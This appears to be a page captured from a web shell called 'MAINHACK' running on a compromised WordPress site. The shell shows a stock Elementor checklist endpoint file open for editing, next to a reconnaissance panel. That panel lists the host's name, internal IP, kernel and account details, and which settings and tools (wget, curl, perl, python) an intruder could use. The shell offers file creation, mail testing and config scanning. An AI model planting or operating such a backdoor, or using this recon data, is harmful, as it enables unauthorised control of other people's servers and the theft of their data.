[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: steps.php
<?php namespace Elementor\Modules\Checklist\Data\Endpoints; use Elementor\Data\V2\Base\Endpoint as Endpoint_Base; use Elementor\Modules\Checklist\Steps\Step_Base; use Elementor\Modules\Checklist\Steps_Manager; use Elementor\Modules\Checklist\Module as Checklist_Module; if ( ! defined( 'ABSPATH' ) ) { exit; // Exit if accessed directly. } class Steps extends Endpoint_Base { public function get_name(): string { return 'steps'; } public function get_format(): string { return 'checklist'; } public function get_items( $request ) { return $this->get_checklist_data(); } public function update_item( $id, $request ) { $checklist_module = Checklist_Module::instance(); $step = $checklist_module->get_steps_manager()->get_step_by_id( $id ); $step->update_step( $request->get_json_params() ); return [ 'data' => 'success', ]; } private function get_checklist_data(): array { $checklist_module = Checklist_Module::instance(); $steps_data = $checklist_module->get_steps_manager()->get_steps_for_frontend(); return [ 'data' => $steps_data, ]; } protected function register() { parent::register(); $this->register_item_route(); $this->register_item_route( \WP_REST_Server::EDITABLE, [ 'id_arg_name' => 'id', 'id_arg_type_regex' => '[\w\-\_]+', 'id' => [ 'type' => 'string', 'description' => 'The step id.', 'required' => true, 'validate_callback' => function ( $step_id ) { return in_array( $step_id, Steps_Manager::get_step_ids() ); }, ], ] ); } }
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: webm021.cluster127.gra.hosting.ovh.net
Server IP: 10.127.20.21
PHP Version: 8.4.22
Server Software: Apache
System: Linux webm021.cluster127.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
HDD Total: 14.32 GB
HDD Free: 8.45 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
Exists
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes
gcc:
No
pkexec:
No
git:
Yes
User Info
Username: vcomplcotr
User ID (UID): 38697
Group ID (GID): 100
Script Owner UID: 38697
Current Dir Owner: 38697